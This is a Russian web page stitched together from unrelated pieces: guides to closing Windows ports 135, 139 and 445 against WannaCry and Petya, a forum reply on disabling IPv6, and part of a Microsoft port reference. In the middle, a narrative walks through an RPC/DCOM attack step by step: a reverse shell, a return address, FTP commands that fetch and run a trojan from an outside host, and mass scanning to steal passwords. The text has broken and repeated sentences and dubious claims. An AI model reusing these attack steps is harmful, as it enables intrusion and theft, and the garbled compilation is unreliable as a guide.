За что отвечает 135 порт в windows. Как закрыть порты Windows. Используем командную строку
Вчера неизвестные устроили очередную массовую атаку с помощью вируса-шифровальщика. Эксперты заявили, что пострадали десятки крупных компаний на Украине и в России. Вирус-шифровальщик носит название Petya.A (вероятно, вирус назван в честь Петра Порошенко). Пишут, что если создать файл perfc (без расширения) и разместить его по адресу C:\Windows\, вирус обойдет вас стороной. Если ваш компьютер ушел в перезагрузку и начал «проверку диска», нужно его немедленно выключить. Загрузка с с LiveCD или USB-диска даст доступ к файлам. Еще один способ защиты: закрыть порты 1024–1035, 135 и 445. Как это сделать мы сейчас разберемся на примере Windows 10.
Шаг 1
Переходим в Брандмауэр Windows (лучше выбрать режим повышенной безопасности), выбираем вкладку «Дополнительные параметры ».
Выбираем вкладку «Правила для входящих подключений », потом действие «Создать правило » (в правой колонке).
Шаг 2
Выбираем тип правила — «для Порта ». В следующем окне выбираем пункт «Протокол TCP », указываем порты, которые хотите закрыть. В нашем случае это «135, 445, 1024-1035 » (без кавычек).
Шаг 3
Выбираем пункт «Блокировать подключение », в следующем окне отмечаем все профили: Доменный, Частный, Публичный.
Шаг 4
Осталось придумать название для правила (чтобы в будущем его было легко найти). Можно указать описание правила.
Если какие-то программы перестанут работать или станут работать неправильно, возможно, вы перекрыли порт, которые они используют. Нужно будет добавить для них исключение в брандмауэре.
135 TCP-порт используется службами удалённого обслуживания (DHCP, DNS, WINS и т.д.) и в приложениях «клиент-сервер» Microsoft (например, Exchange).
445 TCP-порт используется в Microsoft Windows 2000 и поздних версий для прямого TCP/IP-доступа без использования NetBIOS (например, в Active Directory).
Публикация
Вирус WannaCry, он же WannaCrypt или Wanna Decryptor, поразил виртуальный мир в мае 2017 года. Вредоносная программа проникала в локальные сети, заражая один компьютер за другим, шифровала файлы на дисках и требовала от пользователя перевести вымогателям от $300 до $600 за их разблокировку. Аналогичным образом действовал вирус Petya, получивший едва ли не политическую известность летом 2017 года.
Оба сетевых вредителя проникали в операционную систему компьютера-жертвы через одну и ту же дверь — сетевые порты 445 или 139. Вслед за двумя крупными вирусами и более мелкие виды компьютерной заразы начали эксплуатировать Что же это за порты, которые сканируют все, кому не лень?
За что отвечают порты 445 и 139 в ОС Windows
Данные порты используются в системе Windows для совместной работы с файлами и принтерами. Первый порт отвечает за работу протокола Server Message Blocks (SMB), а через второй работает протокол Network Basic Input-Output System (NetBIOS).
Оба протокола позволяют компьютерам под управлением Windows подключаться по сети к «расшаренным» папкам и принтерам поверх основных протоколов TCP и UDP.
Начиная с Windows 2000, совместная работа с файлами и принтерами по сети осуществляется в основном через порт 445 по прикладному протоколу SMB. Протокол NetBIOS использовался в более ранних версиях системы, работая через порты 137, 138 и 139, и данная возможность сохранилась в более поздних версиях системы в качестве атавизма.
Чем опасны открытые порты
445 и 139 представляет собой незаметную, но значимую уязвимость в Windows. Оставляя данные порты незащищенными, вы широко распахиваете дверь на свой жесткий диск для непрошеных гостей вроде вирусов, троянов, червей, а также для хакерских атак. А если ваш компьютер включен в локальную сеть, то риску заражения вредоносным программным обеспечением подвергаются все ее пользователи.
Фактически, вы открываете совместный доступ к своему жесткому диску любому, кто сумеет получить доступ к данным портам.
При желании и умении злоумышленники могут просмотреть содержимое жесткого диска, а то и удалить данные, форматировать сам диск или зашифровать файлы. Именно это и делали вирусы WannaCry и Petya, эпидемия которых прокатилась по миру этим летом.
Таким образом, если вы заботитесь о безопасности своих данных, будет не лишним узнать, как закрыть порты 139 и 445 в Windows.
Выясняем, открыты ли порты
В большинстве случаев порт 445 в Windows открыт, так как возможности совместного доступа к принтерам и файлам автоматически включаются еще при установке Windows. Это можно легко проверить на своей машине. Нажмите сочетание клавиш Win + R , чтобы открыть окно быстрого запуска. В нем введите “ cmd” для запуска командной строки. В командной строке наберите “netstat — na ” и нажмите Enter . Данная команда позволяет просканировать все активные сетевые порты и вывести данные об их статусе и текущих входящих подключениях.
Через несколько секунд появится таблица статистики по портам.
В самом верху таблицы будет указан IP-адрес порта 445. Если в последнем столбце таблицы будет стоять статус “LISTENING” , то это означает, что порт открыт. Аналогичным образом можно найти в таблице порт 139 и выяснить его статус.
Как закрыть порты в Windows 10/8/7
Существует три основных метода, позволяющих закрыть порт 445 в Windows 10, 7 или 8. Они не сильно отличаются друг от друга в зависимости от версии системы и достаточно просты. Можно попробовать любой из них на выбор. Этими же способами можно закрыть и порт 139.
Закрываем порты через брандмауэр
Первый метод, позволяющий закрыть 445 порт в Windows, является наиболее простым и доступен практически любому пользователю.
- Перейдите в Пуск > Панель управления > Брандмауэр Windows и нажмите на ссылку Дополнительные параметры .
- Нажмите Правила для входящих исключений > Новое правило . В отобразившемся окне выберите Для порта > Далее > Протокол TCP > Определенные локальные порты , в поле рядом введите 445 и нажмите Далее.
- Далее выберите Блокировать подключение и опять нажмите Далее . Установите три галочки, снова Далее . Укажите название и, при желании, описание нового правила и нажмите Готово .
Теперь возможность входящего соединения на порт 445 будет закрыта. Если необходимо, аналогичное правило можно создать и для порта 139.
Закрываем порты через командную строку
Второй метод включает в себя операции с командной строкой и больше подходит для продвинутых пользователей Windows.
- Нажмите Пуск и в строке поиска в нижней части меню наберите “cmd” . В отобразившемся списке кликните правой кнопкой мыши на cmd и выберите Запуск от имени администратора .
- В окно командной строки скопируйте команду netsh advfirewall set allprofile state on. Нажмите Enter.
- Затем скопируйте следующую команду: netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=445 name=»Block_TCP-445″. Нажмите Enter еще раз.
Нажмите Enter еще раз.В результате выполнения процедуры так же будет создано правило брандмауэра Windows для закрытия порта 445. Некоторые пользователи, впрочем, сообщают, что данный метод не работает на их машинах: при проверке порт остается в статусе “LISTENING”. В этом случае следует попробовать третий способ, который также достаточно прост.
Закрываем порты через реестр Windows
Блокировать соединения на порт 445 можно также путем внесения изменений в системный реестр. Использовать данный метод следует с осторожностью: реестр Windows является основной базой данных всей системы, и случайно допущенная ошибка может привести к непредсказуемым последствиям. Перед работой с реестром рекомендуется сделать резервную копию, например, с помощью программы CCleaner.
- Нажмите Пуск и в строке поиска введите “regedit” . Нажмите Enter .
- В дереве реестра перейдите в следующий каталог: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\NetBT\Parameters.
- В правой части окна отобразится список параметров. Нажмите правой кнопкой мыши в свободной области списка и выберите Создать . В раскрывающемся меню выберите Параметр DWORD (32-bit)
- Переименуйте новый параметр в SMBDeviceEnabled , а затем дважды кликните по нему. В отобразившемся окне Изменение параметра в поле Значение замените 1 на 0 и нажмите OK для подтверждения.
Этот способ является наиболее эффективным, если точно следовать приведенной выше инструкции. Следует отметить, что он относится только к порту 445.
Для того чтобы защита была эффективнее, после внесения изменений в реестр можно также отключить службу Windows Server. Для этого выполните следующее:
- Нажмите Пуск и в строке поиска введите «services.msc». Откроется список системных служб Windows.
- Найдите службу Server и дважды кликлите по ней. Как правило, она располагается где-то в середине списка.
- В отобразившемся окне в раскрывающемся списке Тип запуска выберите Отключена и нажмите ОК .
Как правило, она располагается где-то в середине списка.Приведенные выше методы (за исключением третьего) позволяют закрыть не только порт 445, но и порты 135, 137, 138, 139. Для этого при выполнении процедуры просто заменяйте номер порта на нужный.
Если вам впоследствии понадобится открыть порты, просто удалите созданное правило в брандмауэре Windows или измените значение созданного в реестре параметра с 0 на 1, а потом включите обратно службу Windows Server, выбрав в списке Тип запуска значение Автоматически вместо Отключена .
Важно! Необходимо помнить, что порт 445 в Windows отвечает за совместный доступ к файлам, папкам и принтерам. Таким образом, если вы закроете данный порт, вы больше не сможете «расшарить» общую папку для других пользователей или распечатать документ по сети.
Если ваш компьютер включен в локальную сеть и данные функции необходимы вам для работы, следует воспользоваться сторонними средствами защиты.
Выполняя приведенные выше рекомендации, можно обезопасить себя от незаметной, но серьезной уязвимости в Windows и защитить свои данные от многочисленных видов зловредного программного обеспечения, которое способно проникнуть в систему через порты 139 и 445.
Уязвимость была устрашающей, правда
готовый эксплоит оказался недоступен для
основной массы людей… Наверное поэтому
никто не чувствовал страха…
Группа польских экспертов в области
безопасности компьютерных технологий «Last
Stage of Delirium» сообщила публике о найденной
ими уязвимости, обработки DCOM объектов в
контексте RPC протокола. Это было чем-то
потрясающим, поскольку данный протокол
существующими на этот момент версиями Windows.
Уязвимыми оказались ОС Windows NT, Windows XP, Windows 2000
и даже Windows Server 2003 был под прицелом.
Этогобыло более чем достаточно, чтобы завладеть
компьютерами большинства пользователей
сети Internet. Более того, многие серверы не
блокировали входящие пакеты на 135 порт,
именно он использовался для атаки. Что
делало их потенциальными жертвами.
Но спустя несколько часов Todd Sabin сообщает,
что уязвимыми являются все сервисы RPC. Это
значит, что настройка брандмауэра на
блокировку 135 порта является не достаточным
средством защиты. Опасности подвергаются
компьютеры с открытыми 135 (UDP/TCP), 139, 445 и 593
портами. СМИ освещают данную ошибку, как
потенциальную угрозу для безопасности
пользователей Windows. Дело шло к глобальной
эксплоита выпущено не было, все продолжали
жить своей прежней жизнью не задумываясь о
последствиях его появления в массах.
Но не все так пассивно отреагировали на
появление данной уязвимости. Хакеры
понемногу начинали писать приватные
эксплоиты, а script kids продолжали ждать его
появления.
Результат не заставил себя долго
ждать. В течении нескольких дней появляются
некоторые наработки в этой области,
появляются первые эксплоиты. Тем не менее
большинство из них просто провоцирует сбой
на удаленной системе. Что можно объяснить,
поскольку технических деталей по поводу
найденной уязвимости известно не было. Хотя
некоторые версии ОС уже успешно
эксплуатировались.
Этот день стал переломным в истории
эксплуатации данной уязвимости. Наконец
появляется техническое описание проблемы.
После чего рождается большое количество
эксплоитов, под разные версии Windows.
Некоторые из них имеют даже графический
интерфейс, а иногда и функцию сканирования
определенного диапазона IP адресов.
Именно в этот момент началась массивная
атака хакеров на рядовых пользователей.
Более того, появился интернет червь MS Blast,
который с легкостью проникал на компьютеры
подключенные к Интернету и даже в
корпоративные сети крупнейших компаний
мира.
В опасности оказались все…
Напасть на удаленную машину не составляет
особого труда. Поэтому script kids взялись за
свое дело. Кража кредитных кард и приватных
эксплоитов возросла в несколько раз. И
многие лакомые сегменты сети стали
пробоваться на вкус. Именно этим занялся
один хакер. Он давно хотел захватить сервер,
но приличной уязвимости под него до этого
не было. А не воспользоваться таким
подарком судьбы он просто не мог.
Пьеса в три акта
Первое, что пришлось ему сделать перед
атакой, это проверить какая именно
операционная система установлена на
сервере. Для этого он воспользовался
утилитой nmap. Хакер не раз уже писал о ее
возможностях, но я повторюсь и скажу, что
она используется для определения версии ОС
на удаленном компьютере. Благо она
существует как для Windows, так и для *nix. А
поскольку хакер для своей работы
использовал Windows, то его выбор пал на
графический вариант nmap.
Несколько минут работы сканера и
результат позитивный. 135 порт оказался
открытым и не защищенным брандмауэром. Это
было началом конца, началом долгожданной
атаки. На этот момент уже было написано
много эксплоитов, в том числе и «RCP Exploit GUI #2».
Его отличительной чертой было то, что он
имел графический интерфейс и содержал в
себе встроенные функции сканирования
диапазона IP, а также FTP сервер.
Запустив эксплоит, он указал адрес
целевого компьютера. Но в списке ОС для
атакуемых машин Windows NT указан не был. А ведь
именно она была установлена на сервере. Это
серьезная проблема, поскольку чтобы
запустить эксплоит необходимо знать его
точный адрес в памяти, чтобы потом передать
на него управление. Немного покопавшись в
файлах, скачанных вместе с эксплоитом он
нашел небольшой список адресов под широкую
разновидность линейки Windows. Среди них
присутствовал и Windows NT с предустановленным
Service Pack 4.
Именно его значение он указал в
качестве адреса возврата, плюнув на ручной
выбор ОС. Число 0xE527F377 стало его тайным
пропуском в жизнь сервера. И он начал атаку.
Система сдалась без каких-либо
происшествий, так у хакера появился reverse-shell
с удаленным сервером. Теперь, когда он мог
исполнять на нем все что угодно, пришло
время установить Троян. Среди большого
числа возможных, был выбран DonaldDick. Для
осуществления своего плана ему пришлось
получить хостинг на бесплатном сервере с
поддержкой FTP. Вполне подошел BY.RU, именно
туда он и закачал сервер для трояна. Теперь,
когда DonaldDick стал доступным по FTP, он обратно
взялся за жертву, а точнее начал закачивать
на нее сервер трояна. Это был хорошо
продуманный план, поскольку уязвимость
могли пропатчить, а троян он и в Африке
троян. Набрав в консоли ftp он принялся
закачивать файл. Весь процесс занял у него,
написания всего лишь пяти строк:
open by.
ru
имя_сервера.by.ru
пароль
get fooware.exe
bye
Где fooware.exe это переименованный сервер для
DonaldDick. Когда файл закачался, ему осталось
только запустить его. Для этого он просто
написал имя файла (fooware.exe) и с наслаждением
нажал Enter… После чего хакер получил удобный
контроль над сервером.
Но знаете как оно всегда бывает, когда
находишь что-то интересное продолжаешь с
этим играть. Так и наш Хакер захотел
получить более чем одну систему. Посмотрев,
что эксплоит позволяет провести массивное
сканирование, он взялся за работу, а точнее
за работу взялся KaHt. Его использование
оказалось не трудным. Так например, чтобы
про сканировать сеть с IP 192.168.0.* (класс С), ему
нужно было набрать «KaHt.exe 129.168.0.1
192.168.0.254″. Что собственно он и сделал,
после чего периодически проверял
результаты. Таким образом он получил доступ
к еще большему количеству пользователей, от
которых потом сумел получить пароли на
разные сервисы, почты, и много другой
полезной информации.
Не говоря уже про то,
что он стал пользоваться многими из них как
анонимными прокси.
Пища к размышлению
Хотя Microsoft давно выпустила заплатку,
пользователи и админы не спешат
устанавливать патчи, надеясь что их сеть не
будет никому интересной. Но таких хакеров
большое количество и установка патча это
скорее необходимость, нежели возможность.
Еще можно блокировать все входящие пакеты
на 135, 139, 445 и 593 порты.
Естественно, что все это хакер делал через
анонимную прокси, а в результате почистил
за собой следы присутствия в системе. Но вам
следует задуматься, прежде чем повторять
его подвиги. Ведь такие действия считаются
противозаконными и могут закончиться для
вас достаточно плачевно…
Кровный , то, что у вас фаервол показывает, что svchost.exe слушает данный порт, ещё не означает, что он открыт для подключения извне.
Правила у вас вроде бы прописаны и должны работать.
Вы сканерами портов пробовали проверять? — ЦОБ (Центр Обеспечения Безопасности) (п.
2.7)
И не забудьте о том, что ещё надо будет проверить IPv6, т.к. он у вас в системе включен, а вот сканеры обычно проверяют только IPv4 (я про централизованные сервисы).
Если данный протокол вам вообще не нужен, тогда его можно отключить:
Источник — http://support.Чтобы отключить компоненты IP версии 6 в Windows Vista, выполните указанные ниже действия.
1. Нажмите кнопку Пуск, введите regedit в поле Начать поиск, затем выберите regedit.exe в списке Программы.
2. В диалоговом окне Контроль учетных записей пользователей нажмите кнопку Продолжить.
3. Найдите и выберите следующий подраздел реестра:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\
4. Дважды щелкните пункт DisabledComponents для изменения параметра DisabledComponents.
Примечание. Если параметр DisabledComponents недоступен, его необходимо создать.
1. В меню Правка выберите пункт Создать, а затем — Параметр DWORD (32 бита).
2. Введите DisabledComponents и нажмите клавишу ВВОД.
3. Дважды щелкните пункт DisabledComponents.
5. Введите любое из указанных ниже значений для настройки протокола IP версии 6, а затем нажмите кнопку ОК.
1. Введите 0, чтобы включить все компоненты IP версии 6.
Примечание. Значение «0» используется по умолчанию.
2. Введите 0xffffffff, чтобы отключить все компоненты IP версии 6, кроме интерфейса замыкания на себя. При этом значении Windows Vista также будет использовать в политиках префиксов протокол IP версии 4 вместо IPv6.
3. Введите 0x20, чтобы использовать в политиках префикса IP версии 4 вместо IP версии 6.
4. Введите 0x10, чтобы отключить собственные интерфейсы IP версии 6.
5. Введите 0x01, чтобы отключить все туннельные интерфейсы IP версии 6.
6. Введите 0x11, чтобы отключить все интерфейсы IP версии 6, кроме интерфейса замыкания на себя.
Примечания
* Использования других значений (кроме 0x0 или 0x20) может вызвать сбой в работе службы маршрутизации и удаленного доступа.
* Чтобы изменения вступили в силу, необходимо перезагрузить компьютер.
Информация в данной статье относится к следующим продуктам.
* Windows Vista Enterprise
* Windows Vista Enterprise 64-bit edition
* Windows Vista Home Basic 64-bit edition
* Windows Vista Home Premium 64-bit edition
* Windows Vista Ultimate 64-bit edition
* Windows Vista Business
* Windows Vista Business 64-bit edition
* Windows Vista Home Basic
* Windows Vista Home Premium
* Windows Vista Starter
* Windows Vista Ultimate
* Windows 7 Enterprise
* Windows 7 Home Basic
* Windows 7 Home Premium
* Windows 7 Professional
* Windows 7 Ultimate
* Windows Server 2008 R2 Datacenter
* Windows Server 2008 R2 Enterprise
* Windows Server 2008 R2 Standard
* Windows Server 2008 Datacenter
* Windows Server 2008 Enterprise
* Windows Server 2008 Standard
Для этого выполните указанные ниже действия.
microsoft.com/kb/929852После отключения и перезагрузки у вас из списка, получаемого командой ipconfig /all исчезнет куча лишних строк и останутся только хорошо известные вам интерфейсы.
Обратное включение выполняется простым удалением созданного ключа из реестра или заменой значения на «0» с последующей перезагрузкой.
Каждый день владельцы ПК сталкиваются с огромным количеством опасных программ и вирусов, которые так или иначе попадают на жесткий диск и становятся причиной утечки важных данных, поломки компьютера, кражи важной информации и других неприятных ситуаций.
Чаще всего заражаются компьютеры, работающие на ОС Windows любых версий, будь то 7, 8, 10 или любая другая. Главная причина такой статистики – входящие подключения к ПК или «порты», которые являются слабым местом любой системы из-за своей доступности по умолчанию.
Слово «порт» – это термин, подразумевающий порядковый номер входящих подключений, которые направляются на ваш ПК от внешнего программного обеспечения.
Часто бывает так, что эти порты используют вирусы, запросто проникающие на ваш компьютер при помощи IP-сети.
Вирусное программное обеспечение, попав в компьютер через такие входящие подключения, быстро заражает все важные файлы, причём не только пользовательские, но и системные. Чтобы этого избежать, мы рекомендуем закрыть все стандартные порты, которые могут стать вашим уязвимым местом при атаке хакеров.
Какие порты у Windows 7-10 самые уязвимые?
Многочисленные исследования и опросы специалистов показывают, что до 80% вредоносных атак и взломов происходили при помощи четырех основных портов, использующихся для быстрого обмена файлами между разными версиями Windows:
- TCP порт 139, необходимый для удаленного подключения и управления ПК;
- TCP порт 135, предназначенный для выполнения команд;
- TCP порт 445, позволяющий быстро передавать файлы;
- UDP порт 137, с помощью которого проводится быстрый поиск на ПК.
Закрываем порты 135-139 и 445 в Виндовс
Мы предлагаем вам ознакомиться с самыми простыми способами закрытия портов Виндовс, которые не требуют дополнительных знаний и профессиональных навыков.
Используем командную строку
Командная строка Windows – это программная оболочка, которая используется для задания определенных функций и параметров софту, не имеющему собственной графической оболочки.
Для того чтобы запустить командную строку, необходимо:
- Одновременно нажать сочетание клавиш Win+R
- В появившейся командной строке ввести CMD
- Нажать на кнопку «ОК»
Появится рабочее окно с чёрным фоном, в котором необходимо поочередно вводить нижеприведенные команды. После каждой введенной строчки нажимайте клавишу Enter для подтверждения действия.
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=135 name=»Block1_TCP-135″ (команда для закрытия порта 135)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=137 name=»Block1_TCP-137″ (команда для закрытия порта 137)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=138 name=»Block1_TCP-138″ (команда для закрытия порта 138)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=139 name=»Block_TCP-139″ (команда для закрытия порта 139)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=445 name=»Block_TCP-445″ (команда для закрытия порта 445)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=5000 name=»Block_TCP-5000″
Шесть приведенных нами команд необходимы для: закрытия 4х уязвимых TCP-портов Windows (открытых по умолчанию), закрытия UDP-порта 138, а также закрытия порта 5000, который отвечает за выведение списка доступных сервисов.
Закрываем порты сторонними программами
Если вы не хотите тратить время на работу с командной строкой, мы предлагаем вам ознакомиться со сторонними приложениями. Суть такого софта заключается в правке реестра в автоматическом режиме с графическим интерфейсом, без необходимости в ручном введении команд.
По мнению наших пользователей, самой популярной программой для этих целей является Windows Doors Cleaner. Она поможет с лёгкостью закрыть порты на компьютере с ОС Windows 7/8/8.1/10. Более старые версии операционных систем, к сожалению, не поддерживаются.
Как работать с программой, закрывающей порты
Для того чтобы воспользоваться Windows Doors Cleaner, необходимо:
1. Скачать софт и установить его
2. Запустить программу, нажав на ярлык правой кнопкой мыши и выбрав «запустить от имени администратора»
3. В появившемся рабочем окне будет список портов и кнопки «Сlose» или «Disable», которые закрывают уязвимые порты Windows, а также любые другие по желанию
4.
После того, как необходимые изменения были внесены, необходимо перезагрузить систему
Ещё одним преимуществом программы является тот факт, что порты с её помощью можно не только закрывать, но и открывать.
Делаем выводы
Закрытие уязвимых сетевых портов в Виндовс – это не панацея от всех бед. Важно помнить, что сетевая безопасность может быть достигнута только комплексными действиями, нацеленными на закрытие всех уязвимостей вашего ПК.
Для безопасности Windows пользователь в обязательном порядке должен устанавливать критические обновления от Microsoft, иметь лицензированных антивирусный софт и включенный файервол, использовать исключительно безопасное программное обеспечение и регулярно читать наши статьи, в которых рассказываем обо всех существующих способах достижения анонимности и безопасности ваших данных.
Вы знаете более удобные способы закрыть сетевые порты? Поделитесь своими знаниями в комментариях и не забывайте репостить статью к себе на страничку.
Делитесь полезной информацией со своими друзьями и не дайте хакерам шанса навредить вашим близким!
Службы и сетевые порты в серверных системах Microsoft Windows. Часть 1
главная — Статьи — Microsoft Windows
Теги: Настройка сервера
В данной статье рассмотрены основные сетевые порты, протоколы и службы, которые используются клиентскими и серверными операционными системами Майкрософт, серверными программами и их компонентами в серверных системах Microsoft Windows. Представленные сведения предназначены для помощи администраторам и специалистам службы поддержки при определении портов и протоколов, необходимых приложениям и операционным системам Майкрософт для функционирования в сегментированной сети.Содержащиеся в этой статье сведения о портах не следует применять при настройке брандмауэра Windows. Сведения о настройке брандмауэра Windows см. в техническом справочнике параметров брандмауэра Windows (Windows Firewall Settings Technical Reference).
Серверная система Windows располагает интегрированной комплексной инфраструктурой, которая предназначена для удовлетворения потребностей разработчиков программного обеспечения и специалистов в области информационных технологий. Запущенные в такой системе программы и решения позволяют сотрудникам быстро, без дополнительных осложнений получать, анализировать и совместно использовать информацию. Серверы, клиентские компьютеры и серверные приложения Майкрософт используют большое количество сетевых портов и протоколов для обмена данными по сети с клиентскими компьютерами и другими серверными системами. Выделенные брандмауэры, брандмауэры в составе узла, а также фильтры безопасности протокола Интернета (IPSec) служат для обеспечения безопасности сети, но, с другой стороны, если с их помощью блокируются порты и протоколы, которые используются определенным сервером, то сервер не сможет отвечать на запросы клиентских компьютеров.
Обзор
Ниже представлен краткий обзор содержания этой статьи.
| • | Раздел Порты системных служб содержит краткое описание каждой службы с указанием логического имени, а также портов и протоколов, которые необходимы ей для правильного функционирования. Обращайтесь к этому разделу для получения сведений об используемых определенной службой портах и протоколах. |
| • | В разделе Порты и протоколы сведения предыдущего раздела обобщены в форме таблицы (таблица отсортирована по номерам портов, а не названиям служб). Обращайтесь к этому разделу для получения сведений о том, какие службы ожидают на определенном порте. |
| • | Системная служба. Серверная система Windows включает большое число программных продуктов, например операционные системы семейств Microsoft Windows 2000 и Microsoft Windows Server 2003, приложения Microsoft Exchange 2000 Server и Microsoft SQL Server 2000. Каждый из этих продуктов состоит из отдельных компонентов, одним из которых и являются системные службы. Системные службы запускаются операционной системой автоматически в процессе загрузки компьютера или по мере необходимости, при выполнении стандартных операций. Так, к числу системных служб на компьютере под управлением Windows Server 2003 Enterprise Edition, помимо прочего, относят службу сервера, службу диспетчера печати и службу веб-публикации. Каждой системной службе сопоставлено обычное имя и понятное имя. Понятное имя службы отображается в средствах управления с графическим интерфейсом, например оснастке «Службы» из состава консоли ММС. Обычное имя службы используется в программах с интерфейсом командной строки, а также многих языках написания сценариев. Системная служба может включать в себя одну или несколько сетевых служб. |
| • | Прикладной протокол. В контексте этой статьи прикладной протокол – это сетевой протокол верхнего уровня, который использует один или несколько протоколов и портов TCP/IP, например HTTP (Hypertext Transfer Protocol), SMB (Server Message Block) и SMTP (Simple Mail Transfer Protocol). |
| • | Протокол. Протоколы TCP/IP функционируют на более низком уровне, чем прикладные протоколы, и являются стандартным форматом взаимодействия между устройствами в сети. К протоколам TCP/IP относятся TCP, UDP (User Datagram Protocol) и ICMP (Internet Control Message Protocol). |
| • | Порт. Сетевой порт, на котором системная служба ожидает входящий сетевой трафик. |
Полное описание архитектуры операционных систем Windows выходит за рамки рассматриваемых в данной статье вопросов. Документацию по этой теме см. на веб-узлах Microsoft TechNet и MSDN (Microsoft Developer Network). Несмотря на то что один и тот же порт TCP или UDP часто используется многими службами, одновременно только одна служба или процесс может активно ожидать на этом порте.Когда в качестве транспортного протокола для удаленного вызова процедур используется протокол TCP/IP или UDP/IP, входящие порты часто назначаются системным службам динамически по мере необходимости (порты TCP/IP и UDP/IP с номерами выше 1024). Неофициально они называются произвольными RPC-портами. В таких случаях клиенты RPC для определения назначенных серверу динамических портов используют службу отображения конечных точек RPC. Для некоторых служб, которые используют удаленный вызов процедур, чтобы не полагаться на динамическое назначение, можно настроить определенный порт. Кроме того, для любой службы можно ограничить диапазон динамически назначаемых портов.
Дополнительные сведения см. в разделе «Ссылки» этой статьи.
Данная статья содержит сведения о ролях системных служб и ролях сервера для продуктов корпорации Майкрософт, которые перечислены в разделе «Информация в данной статье относится к следующим продуктам». Эти сведения часто применимы и к Microsoft Windows XP или Microsoft Windows 2000 Professional, однако в основном статья ориентирована на операционные системы серверного типа. По этой причине в статье описаны порты, на которых ожидают службы, а не порты, используемые клиентскими программами для подключения к удаленной системе.
Порты системных служб
В данном разделе содержится описание каждой системной службы с указанием логического имени, а также используемых портов и протоколов.Active Directory (локальный администратор безопасности)
Служба Active Directory выполняется как процесс LSASS и содержит модули проверки подлинности и репликации для контроллеров домена под управлением Windows 2000 и Windows Server 2003.
Контроллерам домена, клиентским компьютерам и серверам приложений требуется возможность подключения к службе Active Directory по определенным жестко запрограммированным портам (в дополнение к диапазону временных TCP-портов с номерами от 1024 до 65536), кроме случаев, когда для инкапсуляции трафика применяется протокол туннелирования. Примерный состав решения с инкапсуляцией трафика: шлюз виртуальной частной сети под защитой осуществляющего фильтрацию маршрутизатора, использующего протокол L2TP (Layer 2 Tunneling Protocol) с безопасностью IPSec. В этом случае необходимо разрешить протоколам ESP (IPSec Encapsulating Security Protocol) (IP-протокол 50), IPSec Network Address Translator Traversal NAT-T (UDP-порт 4500) и ISAKMP (IPSec Internet Security Association and Key Management Protocol) (UDP-порт 500) проходить через маршрутизатор, вместо того чтобы открывать все перечисленные ниже порты и протоколы. В завершение порт, использующийся для репликации Active Directory, можно жестко запрограммировать в соответствии с инструкциями в статье 224196 «Назначение порта для трафика репликации Active Directory».
Примечание. Фильтрация пакетов трафика L2TP не нужна, поскольку протокол L2TP защищен протоколом IPsec ESP.
Имя системной службы: LSASS
| Прикладной протокол | Протокол | Порты |
| Сервер глобального каталога | TCP | 3269 |
| Сервер глобального каталога | TCP | 3268 |
| Сервер LDAP | TCP | 389 |
| Сервер LDAP | UDP | 389 |
| LDAP SSL | TCP | 636 |
| LDAP SSL | UDP | 636 |
| IPsec ISAKMP | UDP | 500 |
| NAT-T | UDP | 4500 |
| RPC | TCP | 135 |
| ТСР-порты с большими номерами, произвольно назначенные службой RPC | TCP | 1024 — 65536 |
Служба шлюза уровня приложения
Этот компонент службы общего доступа к подключению Интернета (ICS)/брандмауэра подключения к Интернету (ICF) предназначен для поддержки подключаемых модулей, которые позволяют сетевым протоколам проходить через брандмауэр и функционировать в случае использования общего доступа к подключению Интернета.
Подключаемые модули шлюза уровня приложения (Application Layer Gateway, ALG) могут открывать порты и изменять данные (например, порты и IP-адреса) в составе сетевых пакетов. FTP (File Transfer Protocol) – это единственный сетевой протокол с подключаемым модулем, который входит в состав Windows Server 2003 Standard Edition и Windows Server 2003 Enterprise Edition. Подключаемый модуль ALG FTP предназначен для поддержки активных сеансов по протоколу FTP через устройство преобразования сетевых адресов (NAT) путем перенаправления всего трафика, который проходит через устройство NAT на порт 21, на частный порт ожидания с номером в диапазоне от 3000 до 5000 на адаптере замыкания на себя. Подключаемый модуль контролирует и обновляет трафик управляющего канала FTP, пересылает через устройство NAT сопоставление портов для каналов данных FTP, а также обновляет порты в потоке управляющего канала FTP.Имя системной службы: ALG
| Прикладной протокол | Протокол | Порты |
| Управление FTP | TCP | 21 |
Служба состояния сеанса ASP.
NET Служба состояния сеанса ASP.NET предназначена для поддержки внепроцессных состояний сеанса ASP.NET. Служба хранит данные сеанса вне процесса и использует сокеты для взаимодействия с запущенной на сервере средой ASP.NET.Имя системной службы: aspnet_state
| Прикладной протокол | Протокол | Порты |
| Состояние сеанса ASP.NET | TCP | 42424 |
Службы сертификации
Службы сертификации являются частью ядра операционной системы. Они позволяют предприятию выступать в роли самостоятельного центра сертификации (СА), что дает ему возможность выпускать и управлять цифровыми сертификатами для программ и протоколов, например расширений S/MIME (Secure/Multipurpose Internet Mail Extensions), протокола SSL (Secure Sockets Layer), файловой системы EFS (Encrypting File System), системы безопасности IPSec, а также входа в систему с помощью смарт-карты. Взаимодействие с клиентами служба сертификации осуществляет с помощью технологий RPC и DCOM через произвольные TCP-порты с номерами больше 1024.
Имя системной службы: CertSvc
| Прикладной протокол | Протокол | Порты |
| RPC | TCP | 135 |
| Произвольно назначенные ТСР-порты с большими номерами | TCP | произвольный номер порта в диапазоне 1024 – 65534 |
Служба кластеров
Служба кластеров контролирует операции кластера серверов и управляет базой данных кластера. Кластер представляет собой набор отдельных компьютеров, которые действуют как одна система. Руководителям, программистам и пользователям кластер виден в качестве единой системы. Программное обеспечение распределяет данные между узлами кластера. В случае сбоя одного из таких узлов находящиеся в его ведении службы и данные предоставляются другими узлами. Когда восстанавливается или добавляется новый узел, программное обеспечение кластера перемещает на него часть данных.Имя системной службы: ClusSvc
| Прикладной протокол | Протокол | Порты |
| Служба кластера | UDP | 3343 |
| RPC | TCP | 135 |
| Администратор кластеров | UDP | 137 |
| Произвольно назначенные ТСР-порты с большими номерами | TCP | произвольный номер порта в диапазоне 1024 – 65534 |
Обозреватель компьютеров
Системная служба обозревателя компьютеров отвечает за составление текущего списка компьютеров сети и предоставляет его запрашивающим программам.
